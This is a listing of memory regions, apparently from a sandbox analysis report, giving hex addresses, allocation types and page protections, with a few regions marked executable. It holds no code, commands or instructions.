heap
page read and write
754F000
stack
page read and write
5495000
heap
page read and write
771E000
stack
page read and write
8DF000
heap
page read and write
66FF000
heap
page read and write
8DB000
heap
page read and write
864000
heap
page read and write
350D000
trusted library allocation
page execute and read and write
6A02000
heap
page read and write
7692000
heap
page read and write
DBE000
stack
page read and write
6405000
heap
page read and write
6FDF000
stack
page read and write
34C1000
heap
page read and write
7E30000
trusted library allocation
page read and write
5E09000
trusted library allocation
page read and write
6023000
heap
page read and write
3547000
heap
page read and write
8DB000
heap
page read and write
3160000
trusted library allocation
page read and write
6FD0000
trusted library allocation
page read and write
67BC000
heap
page read and write
B8D000
stack
page read and write
8D2000
heap
page read and write
755B000
stack
page read and write
3653000
heap
page read and write
731E000
stack
page read and write
6777000
heap
page read and write
779D000
stack
page read and write
8D2000
heap
page read and write
7D7E000
stack
page read and write
65E0000
heap
page read and write
611A000
trusted library allocation
page read and write
6742000
heap
page read and write
66F0000
heap
page read and write
549D000
heap
page read and write
6A12000
heap
page read and write
9BF000
stack
page read and write
6C00000
trusted library allocation
page read and write
574F000
stack
page read and write
3540000
heap
page read and write
6CBC000
trusted library allocation
page read and write
6121000
trusted library allocation
page read and write
B621000
trusted library allocation
page read and write
6ED0000
heap
page execute and read and write
48DC000
trusted library allocation
page read and write
666D000
heap
page read and write
BB0000
trusted library allocation
page read and write
8E70000
trusted library allocation
page read and write
6A01000
heap
page read and write
7A90000
trusted library allocation
page read and write
6751000
heap
page read and write
71F2000
direct allocation
page read and write
3060000
trusted library allocation
page read and write
6CFF000
trusted library allocation
page read and write
34DD000
heap
page read and write
611C000
trusted library allocation
page read and write
4D87000
heap
page read and write
3238000
stack
page read and write
55E1000
heap
page read and write
77D0000
heap
page read and write
6795000
heap
page read and write
7E40000
trusted library allocation
page read and write
1120000
trusted library allocation
page read and write
6121000
trusted library allocation
page read and write
D50000
heap
page read and write
6CBC000
trusted library allocation
page read and write
66FD000
heap
page read and write
673F000
heap
page read and write
There are 1397 hidden memdumps, click here to show them.